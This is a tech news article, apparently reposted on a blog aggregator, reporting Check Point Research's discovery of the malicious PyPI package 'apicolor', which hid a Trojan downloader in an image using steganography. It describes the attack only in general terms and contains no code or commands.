This random image is spreading a malicious PyPl package using GitHub

Cybersecurity researchers from Check Point Research (CPR) have discovered a new malicious package on PyPI, the code repository for the Pyth...

Cybersecurity researchers from Check Point Research (CPR) have discovered a new malicious package on PyPI, the code repository for the Python programming language which uses an image to deliver a Trojan malware, largely using GitHub.

The threat actors behind this new campaign hope that while searching the web for legitimate projects, Python developers will, sooner or later, come across ‘apicolor’. 

The seemingly benign in-development package on PyPI, once installed, first manually installs extra requirements, and then downloads a picture from the web. The extra requirements process the picture, and trigger the processing generated output using the exec command. 

Steganography attack

One of those two requirements is the judyb code, that’s in fact a steganography module, capable of revealing hidden messages within pictures. That led the researchers back to the picture which, as it turns out, downloads malicious packages from the web to the victim's endpoint.

Malicious image

(Image credit: Check Point Research)

“The immediate place to investigate such packages is GitHub,” the researchers explain. “Researchers searched for code projects using these packages, enabling the team to further understand their infection techniques (if anyone mistakenly installed them and if they did, how it happened). Using this search, it became apparent that apicolor and judib are quite niche, having low usage on GitHub projects.“ 

As soon as CPR notified PyPI of its findings, the latter removed the malicious package from its platform.

While the researchers did not find out who the threat actor behind this campaign was, it did say that the whole ordeal was “carefully planned and thought”, further stating that the obfuscation techniques on PyPI have evolved. 

“We constantly scan PyPI for malicious packages and responsibly report them to PyPI. This one is unique and distinct from almost all the malicious packages we have encountered before,” commented Quote: Ori Abramovsky, Head of Data Science, SpectralOps, a Check Point company. 

“This package differs in the way it camouflages its intent, and the way in which it targets PyPI users to infect them with malicious imports on GitHub. Our findings indicate that PyPI malicious packages and their obfuscation techniques are fast-evolving. The package we have shared here reflects careful and meticulous work. It is not the regular copy and past that we commonly see, but what seems like a real campaign. The creation of the GitHub projects, then smartly hiding the code and downplaying the packages on PyPI, are all sophisticated work.”



from TechRadar - All the latest technology news https://ift.tt/zdS5aOn
via IFTTT

COMMENTS

BLOGGER
Name

Apps,3858,Business,151,Camera,1155,Earn $$$,3,Gadgets,1741,Games,926,GTA,1,Innovations,3,Mobile,1697,Paid Promotions,5,Promotions,5,Sports,1,Technology,8097,Trailers,796,Travel,37,Trending,4,Trendly News,24671,TrendlyNews,4,Video,5,XIAOMI,13,YouTube - 9to5Google,3,
ltr
item
Trendly News | #ListenNow #Everyday #100ShortNews #TopTrendings #PopularNews #Reviews #TrendlyNews: This random image is spreading a malicious PyPl package using GitHub
This random image is spreading a malicious PyPl package using GitHub
https://cdn.mos.cms.futurecdn.net/NHdT7tTMSfnz5oTKcJbwUP.jpg
Trendly News | #ListenNow #Everyday #100ShortNews #TopTrendings #PopularNews #Reviews #TrendlyNews
http://www.trendlynews.in/2022/11/this-random-image-is-spreading.html
http://www.trendlynews.in/
http://www.trendlynews.in/
http://www.trendlynews.in/2022/11/this-random-image-is-spreading.html
true
3372890392287038985
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS PREMIUM CONTENT IS LOCKED STEP 1: Share. STEP 2: Click the link you shared to unlock Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy